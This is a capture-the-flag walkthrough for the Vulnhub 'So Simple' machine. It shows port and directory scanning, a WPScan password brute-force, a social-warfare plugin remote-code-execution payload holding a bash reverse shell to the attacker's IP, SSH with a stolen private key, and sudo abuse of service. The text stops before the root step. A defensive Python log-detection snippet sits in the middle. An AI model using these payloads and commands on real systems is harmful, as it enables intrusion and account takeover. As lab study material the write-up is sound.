So Simple is an easy/beginner-level CTF machine available on Vulnhub, created by @roelvb79. There are three flags (two user flags and one root flag). You can download it from here.
# nmap

```
$ nmap -p- 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 03:14 EDT
Nmap scan report for so-simple.domain.name (192.168.1.3)
Host is up (0.0027s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
Since port 80 is open, start directory fuzzing with dirb or any other tool.

# dirb

```
# dirb http://192.168.1.3/

DIRB v2.22
By The Dark Raver

START_TIME: Mon Aug 17 03:23:43 2020
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.3/ ----
http://192.168.1.3/index.html (CODE:200|SIZE:495)
http://192.168.1.3/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://192.168.1.3/wordpress/
```
Use WPScan or CMSeeK to enumerate WordPress; this time I prefer to go with CMSeeK. CMSeeK is written in Python and helps with testing various CMSs. You can download it from GitHub: https://github.com/Tuhinshubhra/CMSeeK

# cmseek

```
$ python3 cmseek.py -u http://192.168.X.X/wordpress/

[+] Deep Scan Results [+]

 ┏━Target: 192.168.1.3
 ┠── CMS: WordPress
 ┃    ├── Version: 5.4.2
 ┃    ╰── URL: https://wordpress.org
 ┠──[WordPress Deepscan]
 ┃    ├── Readme file found: http://192.168.1.3/wordpress//readme.html
 ┃    ├── License file: http://192.168.1.3/wordpress//license.txt
 ┃    ├── Plugins Enumerated: 2
 ┃    │    ├── Plugin: social-warfare
 ┃    │    │    ├── Version: 3.5.0
 ┃    │    │    ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/social-warfare
 ┃    │    ╰── Plugin: simple-cart-solution
 ┃    │         ├── Version: 5.4.2
 ┃    │         ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/simple-cart-solution
 ┃    ├── Themes Enumerated: 1
 ┃    │    ╰── Theme: twentynineteen
 ┃    │         ├── Version: 1.6
 ┃    │         ╰── URL: http://192.168.1.3/wordpress//wp-content/themes/twentynineteen
 ┃    ├── Usernames harvested: 2
 ┃    │    ├── admin
 ┃    │    ╰── max
```
Now let's try to brute-force the login with WPScan and the rockyou.txt wordlist. user.txt contains the usernames max and admin; for passwords, use rockyou.txt.

```
$ wpscan --url http://192.168.1.3/wordpress/ -U user.txt -P rockyou.txt
[+] Performing password attack on Wp Login against 1 user/s
Trying max / opensesame Time: 00:06:57 <=========================================================> (5960 / 5960) 100.00% Time: 00:06:57
[SUCCESS] - max / opensesame
[!] Valid Combinations Found:
 | Username: max, Password: opensesame
```
# exploitation

Checking the social-warfare plugin (version 3.5.0) turns up https://wpvulndb.com/vulnerabilities/9259, an unauthenticated RCE.
Create a shell.txt file containing the line given below and host it on your local machine. For example, on Kali, start a Python HTTP server with python -m SimpleHTTPServer.

```
system("bash -c 'bash -i >& /dev/tcp/192.168.1.6/4444 0>&1'")
```

Now simply visit http://192.168.1.3/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.6:8000/shell.txt

and catch the shell with nc -lvp 4444.
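On the defending side, both web-facing steps above (the wp-login.php password guessing and the admin-post.php?swp_debug=load_options request that fetches swp_url from another host) leave distinctive traces in the web server's access log. The following is an added example, not part of the original writeup, that flags both patterns over constructed Apache-style log lines; the local_hosts list and the burst threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original page): a burst of
# wp-login.php POSTs from one client, one admin-post.php request carrying the
# swp_debug=load_options / swp_url pair shown above, and one ordinary page view.
SAMPLE_LOG = [
    '192.168.1.6 - - [17/Aug/2020:03:40:%02d -0400] "POST /wordpress/wp-login.php HTTP/1.1" 200 5123' % s
    for s in range(25)
] + [
    '192.168.1.6 - - [17/Aug/2020:03:47:10 -0400] "GET /wordpress/wp-admin/admin-post.php'
    '?swp_debug=load_options&swp_url=http://192.168.1.6:8000/shell.txt HTTP/1.1" 200 0',
    '192.168.1.20 - - [17/Aug/2020:03:50:00 -0400] "GET /wordpress/ HTTP/1.1" 200 495',
]

# Apache combined log format: client IP, timestamp, "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Split one log line into ip, method, path and parsed query; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "method": m.group("method"),
            "path": target.path, "query": parse_qs(target.query)}

def swp_remote_loads(lines, local_hosts=("192.168.1.3", "localhost")):
    """Requests asking admin-post.php to load plugin options from a non-local URL
    (the swp_debug=load_options / swp_url pattern from the advisory above)."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        q = rec["query"]
        if rec["path"].endswith("/admin-post.php") and q.get("swp_debug") == ["load_options"]:
            for url in q.get("swp_url", []):
                if urlsplit(url).hostname not in local_hosts:
                    hits.append((rec["ip"], url))
    return hits

def login_bursts(lines, threshold=20):
    """Client IPs with at least `threshold` POSTs to wp-login.php (password guessing)."""
    counts = Counter(rec["ip"] for rec in filter(None, map(parse_line, lines))
                     if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"))
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Updating the plugin removes the vulnerable load_options path entirely; the log check is for spotting whether it was already exercised before the update.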

Check max's home folder; there is an id_rsa file in the .ssh directory.

Copy it into a local file named id_rsa, fix its permissions, and log in via SSH. That gives the first user flag.

```
chmod 600 id_rsa
ssh -i id_rsa max@192.168.1.3
```

# privilege escalation

For the steven user: sudo -l shows that max may run /usr/sbin/service as steven, and service executes the path it is given, so a relative path to bash yields a shell as steven.

```
sudo -l
sudo -u steven /usr/sbin/service ../../bin/bash
```

Now let's try for root. Running sudo -l as steven shows that a particular bash script can be run with root privileges, but the file is not present, so let's create it.
